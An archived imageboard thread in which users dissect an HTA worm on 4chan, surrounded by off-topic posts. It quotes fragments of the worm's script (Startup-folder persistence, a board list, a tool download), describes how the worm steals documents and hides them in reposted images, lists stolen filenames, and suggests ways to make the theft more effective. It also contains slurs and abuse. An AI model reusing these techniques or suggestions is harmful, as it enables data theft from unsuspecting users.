/sci/ - Science & Math

>implying anyone is stupid enough to download shit and run it as html applications

Hey /sci/

So a few weeks ago fI ell over and got a semi bad cut on my knee.

Now why isi t thatI feel the urge to take the scab off all the time. Shouldn't I awnt it t ostay there psychologically?

>>1447439
You greatly overestimate internet users

>people on fucking /sci/, of all goddamn places, getting raped by this sort of bullshit

Where the fuck did you people leave your fucking logic.
Don't run shit you see on 4chan, you fucking cunts.
You goddamn deserve this shit.

Pic somewhat related

1. Go on 4chan
2. Someone tells you to do something with your computer that you do not even slightly understand (AND uses the words "Shit bricks")
3. Sounds legit, do it.

Anyone who follows that pattern deserves to get their PCs CRUSHED, not used as a botnet.

"It's copying old posts and the pictures in them, adding the code to the pic and then reposts the result in random threads."


WAHAHA THAT`S A HELL OF A FUNNY 4CHAN VIRUS...

>>1447503
>Anyone who follows that pattern deserves to get their skulls CRUSHED.
-fix'd

Is homosexuality really natural? Or a genetic dysfunction (much like almost birth-related biological function)?

I'm fine with either answer as long as it's a constructive and well-rounded arguemnt.

>Developed by Microsoft
fucking microsoft

Everybody is retarded.

>my face when people still believe in global warming

Are we getting haxed?

HEY, HEY GUYS

LOOK AT MY IMAGE

DO YOU SEE WHAT IT DOESN'T HAVE?

YEAH, THAT'S BECAUSE I'M NOT A RETARD.

ENJOY YOUR MENTAL DISABILITIES AND AIDS

>>1447546
A matter of minutes until this post is copied and guarantees some funnies

>>1447501
>implying it is not a troll on the pic

>>1447573
can your shit copy goddamn trips, nigger?

OH LOOK, I CAN NOT BE COPIED :D
That is, unless it just ignores the trip.

>>1447428
What the fuck? That vulnerability... it just sounds so fucking easy to "hack" into anyone's computer.

You can't fucking be serious...

The possibilities are endless with that shit. I am so abusing it from now on to fuck around with friends.

I modified the script.

Basically it causes the script to post something that will get the user who used the script banned.

Here's the pastebin:

http://pastebin.com/Usdjspf0

Do what you want with it.

>>1447480
Fuck you, I hate you.

>>1447593
>mfw you don't even remotely know how it works

>>1447595

That's more social engineering than hacking. It's not an exploit or bug, it's getting the user to do something stupid.

>>1421337
This.

Check out this shit bros.

Pic related: Check it out.

Somebody explain how this virus works/what it does, my curiosity has been piqued.

>>1447696
And by how it works, I mean how it attacks your system. I obviously know how it gets on to the computer thanks to OPs post

If you fell for this then you deserve it. Fucking retard.

anyone else notice that nearly all these idiots that executed the file are foreign (not english/murican)?

>>1447696

hta files run with full access to your system, so they can do whatever the fuck they want.

This downloads a random image from 4chan, downloads an image converter, uses the converter to add the instruction tag to the top left of the image, inserts itself into the image so it can be run again, then it the steals a random file from your documents folder and embeds it in the image before re-uploading it to a random board on 4chan.

All I can say after seeing the kinds of documents this worm carries along, is that most of the people that get infected are subhuman trash.

>>1447737
Total
Agreement

Also, it takes random documents?

Does that mean that one of them COULD contain shit like passwords and shit?

I think its because Radio Communication is Ghetto.

Perhaps in 50 years we will have a new form of communication that use slike quantum entanglement or some crazy shi.t Thus prodcast of radio singles only last a century ro so at most. So perhaps tehres lot sof alien civilizations out there, they just arent using radio waves, and thats what were listening for.

youre an idiot for falling for it

>>1447428

SCIEEENCE
- It chooses a random board
- It chooses a random thread from that board
- It chooses a random post+image from that thread
- It downloads the text and image of that post
- It downloads a graphic editing program to your PC
- It uses the program to add the HTA text to the downloaded image
- It adds the 'virus' code to the image's code
- It randomly switches a few letters in the text to make it 'unique'.
- It posts the image+text on the same board it was taken from, in a random thread. This is why the image and text often seem relevant to the board it's posted on.
It's actually pretty clever.

>>1447737
Jeremy's Christmas list!!!

1) New USB mouse
2) Left 4 dead 2
3) Call of duty modern warfare 2
4) 2 xbox 360 controllers
5) Roller Blades
6) Bike
7) Money
9) K blade Team (Tennis racquet) + XX Lightning strings (58 lbs tension)
10) A Car?
11) A well-fitted Multi-pocket Vest Thats not poofy
12) Psp accessory kit
14) Wii
15) 4 Wii controllers
16) Mario kart Wii
17) Mario party 8
18) New super mario bros wii
19) Wii sports
20) Wii sports resort
21) Warcraft III battle chest

wtf...

>>1447849
ahahaha that's golden.

shit son. when i was a kid i'd get like 2 games and some socks max for xmas. back when it was £40 for a snes game.

>>1447765

It could be anything from the documents folder.
I've found way too many fanfics. Way too many oh god.

God dammit /sci/, you are the most infected board I bother to visit.

>>1448034
You're incredibly wrong.
I frequent about 4 boards and /sci/ is no worse, it's just slower, making the infected threads stay nearer the front page for longer.

>>1447593

I bet it can copy trips.

>>1447848
Nah, it's dump as fuck
For example, the image being uploaded contains both the original image (part4 in the source) and the modified ("Save as...") image (part2 in the source).

Padding is added to make things unique, but the padding is all in one bit and is way too large - There's no point in adding several kilobytes of random alphanumericals (it is limited to those), for detection purposes that just makes it easier.

Also, even though the unmodified image is still included in the upload, if an infected image is chosen the entire infected image is re-infected. This recursive process makes the image grow in size in a linear fashion.

Combined with the multi-kilobyte padding, the images quickly reach the 3072KB size limit, causing the upload to fail.

As the thing cannot detect if the downloaded carrier image is already infected (even though this would be trivial to do), it will not only hit the size limit but in time the flood of infected images will mean that few new images are infected. The result is that the vast majority of images on the board are multi-infected images close to the size limit.
This means that the ratio of infectable images gets lower and lower, until it reaches approximately zero.

tl;dr: The "worm" actually dies out / kills itself due to incompetence on part of the author.

>>1448034

The worm chooses the board to post on completely at random. Slow boards look like they're hit hardest because there are fewer real posts per worm post.

>>1448055

It's entirely possible to capture your trip from your cookies, but this worm is really dumb and doesn't do anything like that.

man its actually kind of tempting

why is this

>>1448059
Also, further analysis suggests that an (not yet identified) bug results in most infected images not having the sidechannel data (the file being smuggled out).

A quick survey gives an approximate 70% failure rate where (for whatever reason) no sidechannel data was attached.

Non-complete analysis of the sidechannel data included on /sci/ gives a predictable result: Most of the sidechannel files that make it out are useless.

So far, the following files have been recovered from /sci/ as side channel data (paths have been pruned):

1277020430774.jpg
Carol Edwards Head of Consumer Education.jpg
GFWLIVESetupLogVerbose.txt
jonslight.txt
linkandtriforce.doc
MumbleAutomaticCertificateBackup.p12
Ticketmaster.mdi

Except for "jonslight.txt", none of these files hold any value (linkandtriforce.doc" is triforce ASCII art).

"jonslight.txt" holds several flight plans from 2009, but offers no personal or otherwise sensitive information, not even a name.

tl;dr: zZzZ

>>1448107
>Carol Edwards

Hahaha oh wow:

http://www.consumercouncil.org.uk/education/consumer-profiles/carol-edwards/

>>1448107
How do you know all that`?

>>1448107
>>1448107


There's a couple more files I managed to find as well. One was some shitty essay, english lit or something. Another was some English for foreign people document.

I get the feeling that the aim of the virus is to far personal info, if it's pulling out random documents. Perhaps the author is hoping to get lucky and pull out something with some sensitive info in it.

>>1448107
Interesting stuff.

It's nice to see /sci/ has an intelligent thread about the spam.

>>1448107

Most people don't really use their "my documents" folder and the worm will drop out of the document loop without selecting anything if the RNG comes up with a zero, so the high failure rate isn't surprising. Thanks to the algorithm used, that'll happen 100% of the time for 0 or 1 document, or %50 of the time for two documents.

>>1448326
There's also a chance the worm will select a directory because it doesn't check if the list entry is a file, and this will cause the insertion operation to fail.

>>1448277

If it was smart, it would pull documents out of the most recently opened documents list. Those are the most likely to contain sensitive data.

>>1447848
>>1447849

>>1448336
True.

>>1448336
I'm a bad person. I hope the author sees this thread and fixes his bad virus.

SCIENCE

>>1447467
When I open that shit in notepad, I find stuff like:
WaitForSingleObject GetProcAddress ñLoadLibraryA L
FreeLibrary ” CreateProcessA — CreateProcessW ¤HeapReAlloc  HeapDestroy ŸHeapCreate WVirtualFree ¡HeapFree HeapAlloc TVirtualAlloc ©HeapValidate žHeapCompact ªHeapWalk ¦HeapSize ZVirtualProtect

And some random characters. Why is this?

>>1448490
Means it grabbed an executable.
Search the file for "c:\" and probably find the path/filename/size.

>An HTA executes without the constraints of the internet browser security model; in fact, it executes as a "fully trusted" application.

But GNU/Linux does not ever assume that files have execution permission. Lol windows.

>>1448513
Oh yeah, it found the more readable path. It adds some javascript shit to the registry, so when you startup IE it runs:
copyname = shell.regRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Startup") + "\\4chan.js";
And this was the path C:\Users\TiMpF\Documents\=).txt
Bytes: 150

Lol, and lots of other interesting stuff
// List of boards
var dir = "a b c d e g h hr k m o p r s t u v w wg i ic cm y r9k 3 adv an cgl ck co fa fit int jp lit mu n new po sci sp tg toy trv tv vp x".split(" ");
var mfs = [3,2,3,3,3,3,3, 8,3,3,3,5,8,3,3,3,3,4, 4,3, 3, 3,3, 2,3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3,3, 3, 8, 3, 3, 3, 3, 8, 3, 3,3];

I want to know how this works, this is funny. There are some comments above the scripts roughly telling what it does, probably for the author to make it easier to find. Just, awesome.

>>1448580
There may also be more than one file embedded in the image. The worm is really stupid and will re-infect already infected files.

>>1448580
>Registry

Wait, so /sci/ actually uses Windows?

>>1448637

This isn't /g/. People use whatever works for them.
I use Linux myself but you'd never know it if I hadn't told you.

>>1448637
Windows home laptop, Linux uni laptop

problem?

>>1448601
Yes I see, there are two scripts inside, both called "thisscript". That's why the bunny with the pancake file is so big. Both parts of the script use imagemagick, and download it. Will these two scripts not interfere with eachother?

// Download ImageMagick
var imc;
try {
imc = download("https://develop.participatoryculture.org/trac/democracy/browser/trunk/dtv-binary-kit/
imagemagick/convert.exe?rev=4463&format=raw");

And it grabs documents, but what exactly happens to these? I can read some basic script stuff, but not when they get long :P The documents are divided into 5 parts, and then what? Are they sent somewhere? Or added in the picture?

>>1448670
It grabs a random document and adds it to the picture.

>>1448637
No I use Linux Mint, so I didn't fear to open that script lol And I know there's gEdit on it, but I just prefer Wine-> notepad haha

>>1448670
It'll just run the script twice, downloading/altering/attaching file/reuploading two images. Because of this careless behaviour though it's liable to make files too large to upload eventually.